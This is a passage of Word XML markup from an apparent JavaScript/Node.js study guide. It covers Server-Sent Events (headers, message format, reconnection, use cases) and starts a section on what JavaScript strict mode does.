          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The server must set Content-Type to text/event-stream to inform the client that it’s sending a stream of events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68985621" w14:textId="77777777" w:rsidR="00260CA6" w:rsidRPr="00DA2F32" w:rsidRDefault="00260CA6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="231"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Cache-Control: no-cache ensures that the response is not cached, and Connection: keep-alive keeps the connection open.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372D2268" w14:textId="77777777" w:rsidR="00260CA6" w:rsidRPr="00DA2F32" w:rsidRDefault="00260CA6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="231"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Sending Data</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598DB144" w14:textId="77777777" w:rsidR="00260CA6" w:rsidRPr="00DA2F32" w:rsidRDefault="00260CA6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="231"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Each event is sent using the format data: message\n\n.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD67477" w14:textId="77777777" w:rsidR="00260CA6" w:rsidRPr="00DA2F32" w:rsidRDefault="00260CA6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="231"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Multiple lines of data can be sent by using data: line1\ndata: line2\n\n.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3ECF3F" w14:textId="77777777" w:rsidR="00260CA6" w:rsidRPr="00DA2F32" w:rsidRDefault="00260CA6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="231"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Handling Disconnections</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA191CE" w14:textId="77777777" w:rsidR="00260CA6" w:rsidRPr="00DA2F32" w:rsidRDefault="00260CA6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="231"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The client automatically tries to reconnect if the connection is lost. You can customize the reconnection behavior using the retry field on the server side.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A637795" w14:textId="77777777" w:rsidR="00260CA6" w:rsidRPr="00DA2F32" w:rsidRDefault="00260CA6" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Advantages of SSE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EF709C" w14:textId="77777777" w:rsidR="00260CA6" w:rsidRPr="00DA2F32" w:rsidRDefault="00260CA6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="232"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Simplicity</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Easier to implement than WebSockets for scenarios that require only one-way communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BFF693" w14:textId="77777777" w:rsidR="00260CA6" w:rsidRPr="00DA2F32" w:rsidRDefault="00260CA6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="232"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Automatic Reconnection</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: The browser handles reconnections automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F634070" w14:textId="77777777" w:rsidR="00260CA6" w:rsidRPr="00DA2F32" w:rsidRDefault="00260CA6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="232"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Lightweight</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: SSE works over a single HTTP connection and does not require additional protocols.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DABFD20" w14:textId="77777777" w:rsidR="00260CA6" w:rsidRPr="00DA2F32" w:rsidRDefault="00260CA6" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use Cases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1A98F4" w14:textId="77777777" w:rsidR="00260CA6" w:rsidRPr="00DA2F32" w:rsidRDefault="00260CA6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="233"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Real-time notifications (e.g., news updates, social media notifications).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496AAACC" w14:textId="77777777" w:rsidR="00260CA6" w:rsidRPr="00DA2F32" w:rsidRDefault="00260CA6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="233"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Live feeds (e.g., stock prices, live sports scores).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3456F46C" w14:textId="07D0A0B2" w:rsidR="005A3D24" w:rsidRPr="00DA2F32" w:rsidRDefault="00260CA6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="233"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Monitoring dashboards (e.g., server status updates).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AF31C9" w14:textId="7BC884EA" w:rsidR="005A3D24" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="71" w:name="_Toc178383254"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Why do you need strict mode</w:t>
      </w:r>
      <w:bookmarkEnd w:id="71"/>
    </w:p>
    <w:p w14:paraId="2BC9AB85" w14:textId="77777777" w:rsidR="00A31B9B" w:rsidRPr="00DA2F32" w:rsidRDefault="00A31B9B" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Strict mode</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> in JavaScript is a way to opt into a restricted variant of JavaScript, which helps catch common coding errors and "unsafe" actions, such as defining global variables. It was introduced in ECMAScript 5 (ES5) and can be applied to entire scripts or individual functions. In Node.js, enabling strict mode can improve your code's safety, security, and performance by avoiding pitfalls that are usually permitted in regular JavaScript.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C5E761" w14:textId="77777777" w:rsidR="00A31B9B" w:rsidRPr="00DA2F32" w:rsidRDefault="00A31B9B" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Key Features of Strict Mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4A5AD1" w14:textId="77777777" w:rsidR="00A31B9B" w:rsidRPr="00DA2F32" w:rsidRDefault="00A31B9B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="234"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Eliminates Some JavaScript Silent Errors</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188AD108" w14:textId="77777777" w:rsidR="00A31B9B" w:rsidRPr="00DA2F32" w:rsidRDefault="00A31B9B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="234"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In strict mode, certain actions that are silently ignored or fail without throwing errors in normal JavaScript will throw errors. For example, assigning a value to an undeclared variable will throw a ReferenceError.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2081CFDD" w14:textId="77777777" w:rsidR="00A31B9B" w:rsidRPr="00DA2F32" w:rsidRDefault="00A31B9B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="234"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Prevents the Use of Global Variables</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F100E5A" w14:textId="77777777" w:rsidR="00A31B9B" w:rsidRPr="00DA2F32" w:rsidRDefault="00A31B9B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="234"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Without strict mode, assigning a value to an undeclared variable creates a global variable. Strict mode prevents this by throwing an error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16036DF6" w14:textId="77777777" w:rsidR="00A31B9B" w:rsidRPr="00DA2F32" w:rsidRDefault="00A31B9B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="234"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Disallows Duplicates in Object Literals</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9E32FD" w14:textId="77777777" w:rsidR="00A31B9B" w:rsidRPr="00DA2F32" w:rsidRDefault="00A31B9B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="234"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Duplicating a property name in an object literal or parameter names in a function will throw an error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C16C55C" w14:textId="77777777" w:rsidR="00A31B9B" w:rsidRPr="00DA2F32" w:rsidRDefault="00A31B9B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="234"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Disallows Octal Syntax</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109E5622" w14:textId="77777777" w:rsidR="00A31B9B" w:rsidRPr="00DA2F32" w:rsidRDefault="00A31B9B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="234"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Octal literals (e.g., 0123 for 83) are not allowed in strict mode.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255B05A2" w14:textId="77777777" w:rsidR="00A31B9B" w:rsidRPr="00DA2F32" w:rsidRDefault="00A31B9B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="234"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Throws Errors on Invalid this</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF3E2EE" w14:textId="77777777" w:rsidR="00A31B9B" w:rsidRPr="00DA2F32" w:rsidRDefault="00A31B9B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="234"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In strict mode, if you use this in a function that is not called as a method (e.g., a function called on its own), this will be undefined instead of the global object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A559E73" w14:textId="77777777" w:rsidR="00A31B9B" w:rsidRPr="00DA2F32" w:rsidRDefault="00A31B9B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="234"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Prevents Deleting undeletable Properties</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AC8164" w14:textId="77777777" w:rsidR="00A31B9B" w:rsidRPr="00DA2F32" w:rsidRDefault="00A31B9B" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="234"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
